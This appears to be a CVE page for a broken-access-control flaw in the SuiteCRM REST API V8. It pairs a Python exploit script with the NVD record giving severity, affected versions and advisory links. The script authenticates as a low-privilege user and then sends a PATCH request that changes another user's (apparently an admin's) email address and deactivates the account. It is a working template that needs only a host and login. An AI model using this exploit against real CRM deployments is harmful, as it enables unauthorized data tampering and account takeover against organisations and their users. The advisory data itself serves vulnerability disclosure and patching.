CVE-2026-29189

import requests # Target configuration target_host = "http://example.com" api_base = f"{target_host}/api/V8" login_url = f"{api_base}/login" # Low privilege user credentials attacker_user = "lowpriv_user" attacker_pass = "password123" # Step 1: Authenticate and get session token session = requests.Session() login_payload = { "username": attacker_user, "password": attacker_pass } resp = session.post(login_url, json=login_payload) if resp.status_code != 200: print("Login failed") exit(1) # Extract token (Assuming standard response structure) token = resp.json().get('token') headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/vnd.api+json" } # Step 2: Exploit Broken Access Control # Attempting to update a record (e.g., another user's profile) that the user shouldn't access target_record_id = "admin_user_id_or_target_record_id" exploit_url = f"{api_base}/module/Records/{target_record_id}" # Payload to modify data (e.g., changing email or status) payload = { "data": { "type": "Users", "id": target_record_id, "attributes": { "email_address": "[email protected]", "status": "Inactive" } } } response = session.patch(exploit_url, json=payload, headers=headers) print(f"Exploit Status: {response.status_code}") print(f"Response Body: {response.text}")

{"cve": {"id": "CVE-2026-29189", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:16.303", "lastModified": "2026-03-23T16:46:51.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the SuiteCRM REST API V8 has missing ACL (Access Control List) checks on several endpoints, allowing authenticated users to access and manipulate data they should not have permission to interact with. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, la API REST V8 de SuiteCRM carece de comprobaciones de ACL (Lista de Control de Acceso) en varios puntos finales, lo que permite a los usuarios autenticados acceder y manipular datos con los que no deberían tener permiso para interactuar. Las versiones 7.15.1 y 8.9.3 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-m6x8-3hxp-qxwv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}